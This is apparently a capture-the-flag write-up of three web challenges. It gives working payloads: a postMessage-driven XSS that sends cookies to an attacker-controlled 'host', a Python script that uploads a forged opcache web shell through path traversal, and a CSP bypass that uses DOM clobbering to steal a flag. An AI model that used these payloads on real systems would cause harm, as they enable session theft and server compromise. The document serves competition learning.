Application was built from 2 parts - frontend page (https://h4x0rs.club/game/) and backend page (https://backend.h4x0rs.club/backend_www/), communicating via postMessage. There were several issues:
- Stored XSS on user profile page.
It's also possible to make victim browser trigger a click on injected element
if(location.hash.slice(1) == 'report'){
document.getElementById('report-btn').click();
}
- Reflected XSS on main page
- No origin checking in backend page. Actually it has, but...
if(e.origin == 'https://www.google.com') return;
So we can inject our iframe and send message to backend page, which will make it to send message from backend page to frontend page and thus obtain JS execution on h4x0rs.club.
The solution was:
- Register two accounts
- Store in first accounts user profile link to main page with injectied iframe to second account profile page.
<a id="report-btn" href="https://h4x0rs.club/game/?msg=%3Ciframe%20src=%22user.php/zxcv2%23report%22%3E%3C/iframe%3E">X</a>
We will override the element returned by #report-btn selector and thus can trigger click on injected element.
- Store in second accounts user profile link to our controlled host and use the same trick to trigger a click on it.
<a id="report-btn" href="https://host/pwn.html">X</A>
The click trick allowed us to bypass XSS auditor and now we have injected iframe with our controlled host on the main page.
- Send message to backend page after some timeout (we need frontend page to set auth token first).
<script>
setTimeout(function(){
parent.frames[1].postMessage({
TOKEN: 1, cmd: "badges", level: 1,
title: "'><script>new Image().src='https://host/?c='+document.cookie<\/script>"
}, "*");
}, 1000);
</script>
- Get flag GET /?c=PHPSESSID=bhm9dve2d0n1r0a8rr5v4cmbh7;%20flag=flag%7Bpostman_1n_the_middl3%7D
- Read phpinfo and compute system_id from it as md5(php_version + zend_extension_build + "BIN_SIZEOF_CHAR48888")
- Clean the dir to remove index.php if it exists
- Get the actual server time and set it to opcached web-shell file to bypass opcache.validate_timestamps
- Upload it
The final exploit was
# remove index.php if exists
requests.get(URL+"?action=reset")
# get timestamp
ts = int(requests.get(URL+"?action=time").text)
# set correct timestamp to our opcached web shell
f = open("index.php.bin").read()
pld = f[:8]+sid+f[40:64]+struct.pack("I", ts)+f[68:]
requests.post(
URL+"?action=upload&name=../../../../../tmp/cache/"+SID+"/var/www/html/sandbox/"+UID+"/index.php.bin"
, files=dict(file=pld)
)
Application with easy-to-find XSS but CSP not allowing us to get what we want.
- We can inject <script> tag and thus break the syntax and prevent /assets/js/config.js file to load.
<script>">...<script nonce="5Gy+AWnMlkogg5b7zUwVVSUsbRs=" src="/assets/js/config.js"></script>
That file contains effects object with code to inject for every desired effect.
var effects = {
'nest': [
'<script src="/assets/js/effects/canvas-nest.min.js"></script>'
],
- Now we need to inject element with id=effects. It'll lead our injected element to be returned as window.effects (or simple effects) value ([http://www.thespanner.co.uk/2013/05/16/dom-clobbering/](DOM Clobbering)).
$(document).ready(function(){
$("body").append((effects[$("#effect").val()]));
});
Now we can append to body any attr of our injected element. But...
- Make short payload. Due to length restrictions of effect parameter, we need to place injected element, attr name and code to get flag in about 70 chars. We used text content of post title to store our payload.
title=<script>$.get("/flag").then(function(e){$.post("/article/881", {comment: e})})</script>&content=z&effect=rel"><a id=effects rel="<script>$('h1').html($('h1').text())"><script>
This payload will make request to flag and post it as comment to our article